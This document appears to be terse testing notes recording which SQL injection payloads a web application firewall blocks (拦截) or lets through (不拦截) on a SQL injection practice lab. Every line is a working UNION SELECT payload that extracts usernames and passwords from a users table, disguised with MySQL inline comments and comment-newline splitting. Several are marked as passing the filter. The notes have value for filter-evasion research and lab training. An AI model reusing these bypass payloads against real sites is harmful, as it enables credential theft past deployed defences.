http://192.11.22.55/sqli/Less-1/?id=-1' /*!union  /*!select 1,username,password */ from users limit 1,2 %23 (拦截)
http://192.11.22.55/sqli/Less-1/?id=-1' /*!union  /*!select 1,username,password  /*!from*/ users limit 1,2 %23 (拦截)
http://192.11.22.55/sqli/Less-1/?id=-1' /*!union  /*!select 1,username,password *//*!*/ from users limit 1,2%23 (拦截)
http://192.11.22.55/sqli/Less-1/?id=-1' /*!union  /*!select 1,username,password */ /*!from*/ users limit 1,2%23 (拦截)

and 1=1 （拦截)
and /*!1=1*/ (不拦截)

order by (不拦截)
order by 1 （拦截)
order by /*!1,2,3*/ (不拦截)


UNION  SELECT （拦截)
union /*|--|*/--+%0aselect 1,2,3 (不拦截)



union /*|--|*/--+%0aselect 1,2,3 from (不拦截)

union /*|--|*/--+%0aselect 1,2,3 from x （拦截)

union /*|--|*/--+%0aselect 1,username,password from /*|--|*/--+%0ausers limit 1,2 （不拦截)
